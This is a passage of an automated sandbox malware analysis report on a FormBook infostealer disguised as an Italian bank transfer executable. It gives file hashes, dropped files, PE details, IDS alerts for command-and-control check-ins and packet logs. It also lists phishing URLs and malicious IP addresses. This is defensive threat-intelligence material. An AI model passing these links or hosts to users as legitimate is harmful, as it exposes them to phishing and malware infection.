                                https://jpmchase.secure.virtru.com/start/?c=experiment&t=emailtemplate2019-09&s=cb.fraud.support*40jpmorgan.com&p=fa9cd416-f12d-4ca6-9ede-e6b8c83c4a51*v=3.0.0&d=https*3A*2F*2Fapi.virtru.com*2Fstorage*2Fapi*2Fpolicies*2Ffa9cd416-f12d-4ca6-9ede-e6b8c83c4a51*2Fdata*2Fmetadata&dk=yMl90AuSQMEzRCCwV9qeqdksefzqpu7fga3Wagk8u4I*3D__;JSMlJSUlJSUlJSUl!!HkjQSg!0uP8FiMYlk3jO60MGS9hLQK-DpGcqhK4tP28hlMpQJ50EIQ5fdHAiEOfq-YjCoK5Zdcyv2Co3yyd4yCft4FhvBrIEKP9$Get hashmaliciousUnknownBrowse
                                • 104.16.117.116
                                original.emlGet hashmaliciousUnknownBrowse
                                • 162.159.135.42
                                https://ipfs.io/ipfs/QmZ1uhxgG3izsY4KucbZqswPgFWzecvF4LdbKLjXvQGnuBGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                OFS Disclosures and Signatures Consent Docs.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.2.184
                                ELECTRONIC RECEIPT_Bdo.htmlGet hashmaliciousHTMLPhisherBrowse
                                • 1.1.1.1
                                scan@jhfoster.com_Katie.bjerke.pdfGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.2.184
                                Caller Left (1) CALL_MSG-3f071d3825a21d1bacd6ea9b1b883065_3f071d3825a21d1bacd6ea9b1b883065.msgGet hashmaliciousHTMLPhisherBrowse
                                • 104.17.25.14
                                TEAMINTERNET-ASDEDHL ARRIVAL DOCUMENTS.pdf.exeGet hashmaliciousFormBookBrowse
                                • 185.53.179.90
                                Mbabane.exeGet hashmaliciousFormBookBrowse
                                • 185.53.178.13
                                http://protect.dscsec.com/software.htmGet hashmaliciousHTMLPhisherBrowse
                                • 185.53.179.29
                                TT-SWIFT-Schindler.exeGet hashmaliciousFormBookBrowse
                                • 185.53.179.90
                                cca9sXT33VsAEdu.exeGet hashmaliciousFormBookBrowse
                                • 185.53.179.90
                                c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                • 185.53.177.20
                                t5SYVk0Tkt.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                • 185.53.177.31
                                UDxMi3I3lO.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                • 185.53.178.54
                                http://www.wickipedia.orgGet hashmaliciousUnknownBrowse
                                • 185.53.178.30
                                TL6bE5Uq4y.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                • 185.53.177.20

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.34331486778365
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                Download File
                                Process:C:\Windows\explorer.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):1022
                                Entropy (8bit):5.202351927401395
                                Encrypted:false
                                SSDEEP:24:YqHZ6T06MhmQvmmb0O0bihmIqvmm6CUXyhmfJgvmmbxdB6hmxvmmz0JahmsvmmbE:YqHZ6T06McFmb0O0bicIjmDUXycR1mb2
                                MD5:3339D6EDF001A2971486F3EAF39F0476
                                SHA1:1F7E104E89EC728EDF3488EB66B5E97F2B32708F
                                SHA-256:547E26B6B9B96A8F2C813F8C37DD731CC8D4CF0FEA5A6006DD1E302DCC4EFB19
                                SHA-512:458178CF74A9DB8817940EA9DAF336A8D783D8D5165CFD46F3E01D96BBD55E226F9C13B041CF5515DB0343848E78981E76D4BD4154B79275EEF4E2A1A29F71BC
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2278598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2268598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2258598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2248598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2238598928,"LastSwitchedHighPart":31061882,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2228598928,"LastSwitchedHighPart":31061882,

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1172
                                Entropy (8bit):5.355024937536926
                                Encrypted:false
                                SSDEEP:24:3OWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:eWSU4xymI4RfoUeW+mZ9tK8ND3
                                MD5:4FF4EA0534E06DBD3B9C6078779177B5
                                SHA1:5DDA708CF64996323E26348C595E866596EE6F71
                                SHA-256:D02254F27E815DA15DC98673A240E97983532EC9C4740A6892925B5DE7560DAA
                                SHA-512:978C7DE1868842A0E66FC47B1009B841AC82F50954977D639E9CE6DD7F09A2272F8C9196CB4EE2260CBEEB5A99CD0A7C1C2CAB7552A45181B827120525E74E39
                                Malicious:false
                                Reputation:low
                                Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41p55kw0.lp0.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ayukceaj.yeg.psm1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw1qdhoc.n05.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z24wa3mv.4bu.ps1

                                Download File
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.942608107835512
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Windows Screen Saver (13104/52) 0.07%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                File name:Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                File size:643'584 bytes
                                MD5:6b799c2e76b37bf96ef35ba8580f0bfc
                                SHA1:b710a5aa6385f9424c37c944ef27d10ef99df97f
                                SHA256:e10280c91dc1fb46756d9473163eec9052b8c8a352955d0f21a24246da054ba2
                                SHA512:3d24d60ddf69dfe6c6124df627dadcb833d8339e59b446cf44a9ecf222d36e58e3d222c8b8f1937554236a0d6121d3fb0d423160ea473a5cd412c8aecac92823
                                SSDEEP:12288:3fGyCK2xrOonraIEGL78bDS8k67E7KJIojZKBZnU02gvPQ3WEF00QiHM:uyC5raI9L+DS8jkoVgT2KPQ3B9
                                TLSH:34D4220B7265CF21D6BE9BF56024202013F5FBA73D52DA6CAEC4A0EB2D79BD54601E43
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...bN................0.............2.... ........@.. .......................@............@................................

                                File Icon

                                Icon Hash:90cececece8e8eb0

                                Static PE Info

                                General

                                Entrypoint:0x49e632
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x9ED14E62 [Mon Jun 8 07:40:18 2054 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9e5df0x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x5ac.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x9c26c0x70.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x9c6380x9c800097f60be93bf7226152b8eedda64f4e3False0.9499971919928115data7.94939514943548IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rsrc0xa00000x5ac0x60076a41dbf1d0b15414e71e9cefd7df29bFalse0.4205729166666667data4.080984014354251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xa20000xc0x200a205a90496ba84f1f4dbc9ab25f17309False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_VERSION0xa00900x31cdata0.435929648241206
                                RT_MANIFEST0xa03bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                06/21/24-16:14:50.292769TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.11188.114.96.3
                                06/21/24-16:17:32.715564TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486780192.168.2.11188.114.96.3
                                06/21/24-16:16:30.997720TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486480192.168.2.11185.53.179.92
                                06/21/24-16:17:12.110813TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486680192.168.2.11192.64.118.107
                                06/21/24-16:18:16.654776TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486880192.168.2.11107.158.172.173
                                06/21/24-16:15:50.125620TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486280192.168.2.113.64.163.50
                                06/21/24-16:16:51.501355TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486580192.168.2.11103.169.142.0
                                06/21/24-16:16:10.912575TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486380192.168.2.11172.67.158.16
                                06/21/24-16:15:29.832153TCP2031412ET TROJAN FormBook CnC Checkin (GET)6486180192.168.2.11188.114.97.3

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jun 21, 2024 16:14:50.287512064 CEST4971680192.168.2.11188.114.96.3
                                Jun 21, 2024 16:14:50.292651892 CEST8049716188.114.96.3192.168.2.11
                                Jun 21, 2024 16:14:50.292721033 CEST4971680192.168.2.11188.114.96.3
                                Jun 21, 2024 16:14:50.292768955 CEST4971680192.168.2.11188.114.96.3
                                Jun 21, 2024 16:14:50.297537088 CEST8049716188.114.96.3192.168.2.11
                                Jun 21, 2024 16:14:50.797755957 CEST4971680192.168.2.11188.114.96.3
                                Jun 21, 2024 16:14:50.814601898 CEST8049716188.114.96.3192.168.2.11
                                Jun 21, 2024 16:14:50.814686060 CEST4971680192.168.2.11188.114.96.3
                                Jun 21, 2024 16:15:11.008503914 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:11.014323950 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:11.016506910 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:11.016506910 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:11.023874044 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:11.501030922 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:11.813723087 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.422712088 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.509788990 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.509828091 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.509838104 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.510029078 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.510130882 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.510179043 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.510247946 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.510360956 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.510895967 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.510960102 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.512238026 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.512248039 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.512257099 CEST8064860185.148.106.71192.168.2.11
                                Jun 21, 2024 16:15:12.512290955 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.512317896 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:12.512317896 CEST6486080192.168.2.11185.148.106.71
                                Jun 21, 2024 16:15:29.826745987 CEST6486180192.168.2.11188.114.97.3
                                Jun 21, 2024 16:15:29.832015038 CEST8064861188.114.97.3192.168.2.11
                                Jun 21, 2024 16:15:29.832107067 CEST6486180192.168.2.11188.114.97.3
                                Jun 21, 2024 16:15:29.832153082 CEST6486180192.168.2.11188.114.97.3
                                Jun 21, 2024 16:15:29.836941004 CEST8064861188.114.97.3192.168.2.11
                                Jun 21, 2024 16:15:30.291491032 CEST8064861188.114.97.3192.168.2.11
                                Jun 21, 2024 16:15:30.291708946 CEST6486180192.168.2.11188.114.97.3
                                Jun 21, 2024 16:15:30.291867971 CEST8064861188.114.97.3192.168.2.11
                                Jun 21, 2024 16:15:30.296297073 CEST6486180192.168.2.11188.114.97.3
                                Jun 21, 2024 16:15:30.296916008 CEST8064861188.114.97.3192.168.2.11
                                Jun 21, 2024 16:15:50.117763996 CEST6486280192.168.2.113.64.163.50
                                Jun 21, 2024 16:15:50.125426054 CEST80648623.64.163.50192.168.2.11
                                Jun 21, 2024 16:15:50.125507116 CEST6486280192.168.2.113.64.163.50
                                Jun 21, 2024 16:15:50.125619888 CEST6486280192.168.2.113.64.163.50
                                Jun 21, 2024 16:15:50.130357981 CEST80648623.64.163.50192.168.2.11
                                Jun 21, 2024 16:15:50.628242970 CEST6486280192.168.2.113.64.163.50
                                Jun 21, 2024 16:15:50.633749962 CEST80648623.64.163.50192.168.2.11
                                Jun 21, 2024 16:15:50.636840105 CEST6486280192.168.2.113.64.163.50
                                Jun 21, 2024 16:16:10.903238058 CEST6486380192.168.2.11172.67.158.16
                                Jun 21, 2024 16:16:10.908677101 CEST8064863172.67.158.16192.168.2.11
                                Jun 21, 2024 16:16:10.912400007 CEST6486380192.168.2.11172.67.158.16
                                Jun 21, 2024 16:16:10.912575006 CEST6486380192.168.2.11172.67.158.16
                                Jun 21, 2024 16:16:10.919908047 CEST8064863172.67.158.16192.168.2.11
                                Jun 21, 2024 16:16:11.422813892 CEST6486380192.168.2.11172.67.158.16
                                Jun 21, 2024 16:16:11.428919077 CEST8064863172.67.158.16192.168.2.11
                                Jun 21, 2024 16:16:11.428972006 CEST6486380192.168.2.11172.67.158.16
                                Jun 21, 2024 16:16:30.991345882 CEST6486480192.168.2.11185.53.179.92
                                Jun 21, 2024 16:16:30.997045994 CEST8064864185.53.179.92192.168.2.11
                                Jun 21, 2024 16:16:30.997601032 CEST6486480192.168.2.11185.53.179.92
                                Jun 21, 2024 16:16:30.997720003 CEST6486480192.168.2.11185.53.179.92
                                Jun 21, 2024 16:16:31.002821922 CEST8064864185.53.179.92192.168.2.11
                                Jun 21, 2024 16:16:31.501100063 CEST6486480192.168.2.11185.53.179.92
                                Jun 21, 2024 16:16:31.507375002 CEST8064864185.53.179.92192.168.2.11
                                Jun 21, 2024 16:16:31.507438898 CEST6486480192.168.2.11185.53.179.92
                                Jun 21, 2024 16:16:51.496203899 CEST6486580192.168.2.11103.169.142.0
                                Jun 21, 2024 16:16:51.501015902 CEST8064865103.169.142.0192.168.2.11
                                Jun 21, 2024 16:16:51.501074076 CEST6486580192.168.2.11103.169.142.0
                                Jun 21, 2024 16:16:51.501354933 CEST6486580192.168.2.11103.169.142.0
                                Jun 21, 2024 16:16:51.506179094 CEST8064865103.169.142.0192.168.2.11
                                Jun 21, 2024 16:16:51.995676994 CEST8064865103.169.142.0192.168.2.11
                                Jun 21, 2024 16:16:51.995804071 CEST6486580192.168.2.11103.169.142.0
                                Jun 21, 2024 16:16:51.996459961 CEST8064865103.169.142.0192.168.2.11
                                Jun 21, 2024 16:16:51.996526957 CEST6486580192.168.2.11103.169.142.0
                                Jun 21, 2024 16:16:52.001080036 CEST8064865103.169.142.0192.168.2.11
                                Jun 21, 2024 16:17:12.105763912 CEST6486680192.168.2.11192.64.118.107
                                Jun 21, 2024 16:17:12.110692978 CEST8064866192.64.118.107192.168.2.11
                                Jun 21, 2024 16:17:12.110755920 CEST6486680192.168.2.11192.64.118.107
                                Jun 21, 2024 16:17:12.110812902 CEST6486680192.168.2.11192.64.118.107
                                Jun 21, 2024 16:17:12.115788937 CEST8064866192.64.118.107192.168.2.11
                                Jun 21, 2024 16:17:12.610558033 CEST6486680192.168.2.11192.64.118.107
                                Jun 21, 2024 16:17:12.616962910 CEST8064866192.64.118.107192.168.2.11
                                Jun 21, 2024 16:17:12.617563009 CEST6486680192.168.2.11192.64.118.107
                                Jun 21, 2024 16:17:32.682173014 CEST6486780192.168.2.11188.114.96.3
                                Jun 21, 2024 16:17:32.687000990 CEST8064867188.114.96.3192.168.2.11
                                Jun 21, 2024 16:17:32.694859982 CEST6486780192.168.2.11188.114.96.3
                                Jun 21, 2024 16:17:32.715564013 CEST6486780192.168.2.11188.114.96.3
                                Jun 21, 2024 16:17:32.720355034 CEST8064867188.114.96.3192.168.2.11
                                Jun 21, 2024 16:17:33.188185930 CEST8064867188.114.96.3192.168.2.11
                                Jun 21, 2024 16:17:33.188211918 CEST8064867188.114.96.3192.168.2.11
                                Jun 21, 2024 16:17:33.188222885 CEST8064867188.114.96.3192.168.2.11
                                Jun 21, 2024 16:17:33.188417912 CEST6486780192.168.2.11188.114.96.3
                                Jun 21, 2024 16:17:33.188417912 CEST6486780192.168.2.11188.114.96.3
                                Jun 21, 2024 16:17:33.188417912 CEST6486780192.168.2.11188.114.96.3
                                Jun 21, 2024 16:17:33.193198919 CEST8064867188.114.96.3192.168.2.11

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jun 21, 2024 16:14:50.236855984 CEST5870553192.168.2.111.1.1.1
                                Jun 21, 2024 16:14:50.286693096 CEST53587051.1.1.1192.168.2.11
                                Jun 21, 2024 16:14:51.586668968 CEST5362025162.159.36.2192.168.2.11
                                Jun 21, 2024 16:14:52.085573912 CEST53606681.1.1.1192.168.2.11
                                Jun 21, 2024 16:15:10.846163034 CEST5605653192.168.2.111.1.1.1
                                Jun 21, 2024 16:15:11.005785942 CEST53560561.1.1.1192.168.2.11
                                Jun 21, 2024 16:15:29.673865080 CEST6388953192.168.2.111.1.1.1
